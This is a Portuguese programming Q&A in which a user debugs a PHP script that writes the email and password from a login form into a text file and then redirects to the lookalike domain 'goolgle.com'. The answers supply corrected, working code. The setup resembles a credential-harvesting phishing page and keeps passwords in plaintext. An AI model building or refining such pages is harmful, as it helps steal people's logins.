# Receber dados do formulário em um arquivo TXT

Tags: php, html

Galera estou com um trabalho da faculdade para fazer e estou tentando, já peguei alguns formulários online e nada. Gostaria de saber onde estou errando...obrigado :)

FRONT END QUE ENVIA

```
<!DOCTYPE html>
<html>
<title>Jumanji World</title>
<body>

<h2>Welcome to Jumanji</h2>

<form action="salva.php" method="POST" >
  <input type="email" name="usuario" id="usuario" placeholder="E-mail: ">
  <input type="password" name="senha" id="senha" placeholder="Senha: ">
  <input type=submit value="Entrar">
</form>

<p>“Na selva, espere afoito, até o resultado ser cinco ou oito”..</p>



</body>
</html>
```

PHP QUE RECEBE

```
<?php
$login = $POST["user"];
$senha = $POST["pass"];

$consolidado = "Email:  $user - Senha: $pass";
$arquivo = fopen('meu_arquivo.txt', 'w');
if ($arquivo == false)
    die('Não foi possível enviar seu arquivo.');
fwrite($arquivo, $consolidado);
fclose($arquivo);
header("location: https://www.goolgle.com/");
?>
```

Comment: O que está acontecendo? Dá alguma mensagem de erro?

Answer (score 0, accepted):

Olá, temos 2 problemas!

1) Nomes de variáveis

2) Parâmetro do fopen [PHP - fopen](https://www.php.net/manual/pt_BR/function.fopen.php)

3) Usou $POST ao invés da variável global **$_POST**

Tente **PADRONIZAR** os nomes das variáveis (Form e PHP)

HTML

```
<!DOCTYPE html>
<html>
<title>Jumanji World</title>
<body>

<h2>Welcome to Jumanji</h2>

<form action="salva.php" method="POST" >
  <input type="email" name="email" id="email" placeholder="E-mail: ">
  <input type="password" name="senha" id="senha" placeholder="Senha: ">
  <input type=submit value="Entrar">
</form>

<p>“Na selva, espere afoito, até o resultado ser cinco ou oito”..</p>
</body>
</html>
```

SALVA.PHP

```
<?php
$email= $_POST["email"]; // = name do form
$senha = $_POST["senha"]; // = name do form

$consolidado = "Email:  $email- Senha: $senha";
$arquivo = fopen('meu_arquivo.txt', 'w+'); // w+: cria o arquivo se não existir
if ($arquivo == false)
    die('Não foi possível enviar seu arquivo.');
fwrite($arquivo, $consolidado);
fclose($arquivo);
header("location: https://www.goolgle.com/");
?>
```

Espero ter ajudado!

Comment: Olá Caique! Revisei a resposta e havia me esquecido de um detalhe! Agora está completa! Se foi útil, favor aceitar a resposta ;)

Answer (score 0):

Acredito que o problema esta no atributo `name` que você esta dando aos campos `name="usuario"` e `name="senha"` eles diferem do que você esta pegando no arranjo (array) $POST.

```
$login = $POST["user"];
$senha = $POST["pass"];
```

Você pode usar algum depurador (debug) para ver isso (o que sugiro fortemente) ou dar um print (`echo`) e ver o que tem dentro do se array `$POST`.

Answer (score 0):

FRONT END QUE ENVIA

```
<!DOCTYPE html>
<html>
<title>Jumanji World</title>
<body>

<h2>Welcome to Jumanji</h2>

<form action="salva.php" method="POST" >
  <input type="email" name="usuario" id="usuario" placeholder="E-mail: ">
  <input type="password" name="senha" id="senha" placeholder="Senha: ">
  <input type=submit value="Entrar">
</form>

<p>“Na selva, espere afoito, até o resultado ser cinco ou oito”..</p>

</body>
</html>
```

PHP QUE RECEBE

```
<?php
$login = $_POST["usuario"];
$senha = $_POST["senha"];

$consolidado = "Email:  $login - Senha: $senha";
$arquivo = fopen('meu_arquivo.txt', 'w');
if ($arquivo == false)
    die('Não foi possível enviar seu arquivo.');
fwrite($arquivo, $consolidado);
fclose($arquivo);
//header("location: https://www.goolgle.com/");
?>
```

Partindo do FRONT END QUE ENVIA temos:

- um formulário que está enviando via `POST` um input com `name = usuario` e outro input com `name senha`
- O PHP vai fazer uso desses `names` para recuperar os valores dos inputs
- $ _POST `(e não $POST conforme se vê na sua pergunta e respostas)` é uma variável super global do PHP usada para coletar dados do formulário após o envio de um formulário HTML com o método = "POST"
- Se você envia um input com `name="usuario"` no PHP tem que recuperar assim `$_POST["usuario"];`
- A variável `$consolidado` deverá conter as variáveis criadas no PHP `$login e $senha`
- Sobre a linha no final do PHP `header("location: https://www.goolgle.com/");` vai gerar um erro PHP Warning:  Cannot modify header information - headers already sent by... que você pode ler nesse post [headers already sent](https://pt.stackoverflow.com/questions/4251/erro-cannot-modify-header-information-headers-already-sent)